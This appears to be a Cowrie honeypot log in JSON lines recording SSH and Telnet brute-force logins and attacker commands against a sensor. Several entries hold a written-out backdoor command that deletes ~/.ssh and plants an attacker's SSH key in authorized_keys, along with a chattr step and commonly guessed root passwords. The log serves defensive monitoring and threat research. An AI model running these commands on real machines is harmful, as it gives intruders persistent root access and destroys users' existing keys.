{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:56:42.952277Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:56:43.137214Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:43.138355Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34598,"dst_ip":"1.2.3.4","dst_port":22,"session":"43d09637fc09","protocol":"ssh","message":"New connection: 212.227.235.229:34598 (1.2.3.4:22) [session: 43d09637fc09]","sensor":"my-vps","timestamp":"2025-08-28T14:56:43.324917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:56:43.325729Z","src_ip":"212.227.235.229","session":"43d09637fc09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:56:43.511729Z","src_ip":"212.227.235.229","session":"43d09637fc09"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:56:44.298980Z","src_ip":"212.227.235.229","session":"43d09637fc09"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:45.487771Z","src_ip":"212.227.235.229","session":"43d09637fc09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35780,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d511cb07795","protocol":"ssh","message":"New connection: 212.227.235.229:35780 (1.2.3.4:22) [session: 2d511cb07795]","sensor":"my-vps","timestamp":"2025-08-28T14:56:45.665311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:56:45.666219Z","src_ip":"212.227.235.229","session":"2d511cb07795"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:56:45.847398Z","src_ip":"212.227.235.229","session":"2d511cb07795"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:56:46.615614Z","src_ip":"212.227.235.229","session":"2d511cb07795"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:46.798827Z","src_ip":"212.227.235.229","session":"2d511cb07795"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:46.799963Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37914,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3108ea883c7","protocol":"telnet","message":"New connection: 212.227.125.160:37914 (1.2.3.4:23) [session: a3108ea883c7]","sensor":"my-vps","timestamp":"2025-08-28T14:56:52.977757Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":14229,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f01c53cd4ef","protocol":"telnet","message":"New connection: 212.227.125.160:14229 (1.2.3.4:23) [session: 4f01c53cd4ef]","sensor":"my-vps","timestamp":"2025-08-28T14:56:53.503061Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:56:53.840737Z","src_ip":"212.227.125.160","session":"a3108ea883c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:56:53.859362Z","src_ip":"212.227.125.160","session":"a3108ea883c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47568,"dst_ip":"1.2.3.4","dst_port":23,"session":"ddf67d5af72e","protocol":"telnet","message":"New connection: 212.227.235.229:47568 (1.2.3.4:23) [session: ddf67d5af72e]","sensor":"my-vps","timestamp":"2025-08-28T14:56:54.220417Z"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T14:56:54.276295Z","src_ip":"212.227.125.160","session":"a3108ea883c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:55.308967Z","src_ip":"212.227.125.160","session":"a3108ea883c7"}
{"eventid":"cowrie.session.closed","duration":2.335390090942383,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:55.313074Z","src_ip":"212.227.125.160","session":"a3108ea883c7"}
{"eventid":"cowrie.session.closed","duration":12.688783168792725,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:06.191773Z","src_ip":"212.227.125.160","session":"4f01c53cd4ef"}
{"eventid":"cowrie.session.connect","src_ip":"209.38.226.254","src_port":44062,"dst_ip":"1.2.3.4","dst_port":22,"session":"cabd7e567590","protocol":"ssh","message":"New connection: 209.38.226.254:44062 (1.2.3.4:22) [session: cabd7e567590]","sensor":"my-vps","timestamp":"2025-08-28T14:57:13.901700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:57:13.902761Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:57:13.914602Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:57:14.001791Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:57:14.044456Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T14:57:14.045223Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:14.057919Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:14.058928Z","src_ip":"209.38.226.254","session":"cabd7e567590"}
{"eventid":"cowrie.session.closed","duration":34.366753578186035,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:28.587106Z","src_ip":"212.227.235.229","session":"ddf67d5af72e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60106,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f86a6f68c0","protocol":"ssh","message":"New connection: 212.227.235.229:60106 (1.2.3.4:22) [session: 77f86a6f68c0]","sensor":"my-vps","timestamp":"2025-08-28T14:57:42.007710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:57:42.009598Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:57:42.186893Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w!Q@W","message":"login attempt [root/1q2w!Q@W] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:57:42.898764Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:57:43.271083Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:57:43.271802Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:57:43.273001Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:43.452201Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:57:43.867048Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:57:43.867825Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:57:44.048229Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:44.049346Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60772,"dst_ip":"1.2.3.4","dst_port":22,"session":"bab07d1728f7","protocol":"ssh","message":"New connection: 212.227.235.229:60772 (1.2.3.4:22) [session: bab07d1728f7]","sensor":"my-vps","timestamp":"2025-08-28T14:57:44.235157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:57:44.236022Z","src_ip":"212.227.235.229","session":"bab07d1728f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:57:44.420700Z","src_ip":"212.227.235.229","session":"bab07d1728f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:57:45.199743Z","src_ip":"212.227.235.229","session":"bab07d1728f7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:46.387400Z","src_ip":"212.227.235.229","session":"bab07d1728f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33576,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c842b55815","protocol":"ssh","message":"New connection: 212.227.235.229:33576 (1.2.3.4:22) [session: c2c842b55815]","sensor":"my-vps","timestamp":"2025-08-28T14:57:46.560561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:57:46.561475Z","src_ip":"212.227.235.229","session":"c2c842b55815"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:57:46.738497Z","src_ip":"212.227.235.229","session":"c2c842b55815"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:57:47.487350Z","src_ip":"212.227.235.229","session":"c2c842b55815"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:47.666100Z","src_ip":"212.227.235.229","session":"77f86a6f68c0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:57:47.667123Z","src_ip":"212.227.235.229","session":"c2c842b55815"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57138,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dc9ab98f0e5","protocol":"ssh","message":"New connection: 212.227.235.229:57138 (1.2.3.4:22) [session: 7dc9ab98f0e5]","sensor":"my-vps","timestamp":"2025-08-28T14:58:37.124597Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:58:37.302207Z","src_ip":"212.227.235.229","session":"7dc9ab98f0e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57140,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffddb69d1502","protocol":"ssh","message":"New connection: 212.227.235.229:57140 (1.2.3.4:22) [session: ffddb69d1502]","sensor":"my-vps","timestamp":"2025-08-28T14:58:37.478532Z"}
